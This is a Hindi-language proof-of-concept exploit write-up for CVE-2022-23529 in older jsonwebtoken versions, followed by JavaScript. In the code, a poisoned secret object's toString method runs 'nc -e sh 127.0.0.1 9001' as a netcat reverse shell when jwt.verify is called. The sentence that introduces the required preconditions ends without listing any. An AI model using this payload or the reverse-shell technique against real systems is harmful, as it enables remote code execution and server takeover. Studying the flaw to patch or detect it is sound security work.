
CVE-2022-23529 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, दुर्भावनापूर्ण HMAC गुप्त वस्तुओं के माध्यम से कमजोर JWT लाइब्रेरीज़ में RCE प्रदर्शित करता है।
JSON वेब टोकन (JWT) लाइब्रेरी के संस्करण 3.4.6, 4.0.4, और 4.1.5 से पहले के संस्करण RCE के प्रति संवेदनशील हैं।
HMAC हैशिंग फ़ंक्शन किसी भी स्ट्रिंग को इनपुट के रूप में लेते हैं, जिससे RCE होता है।
पूर्व शर्तों के कारण, इस कमजोरी का शोषण होने की संभावना नहीं है।
इस कमजोरी का शोषण करने के लिए, एक हमलावर को निम्नलिखित में से एक शर्त सत्य होनी चाहिए:
var jwt = require('jsonwebtoken');
var token = jwt.sign({"x":"y"}, 'servers_secret');
var poisoned_secret_on_server = {
toString : ()=> {console.log('PWNED AFTER PASRSING TOKEN');
process.on('exit', ()=> {
require('child_process').exec('nc -e sh 127.0.0.1 9001');
});
process.exit(0)
}
}
jwt.verify(token, poisoned_secret_on_server);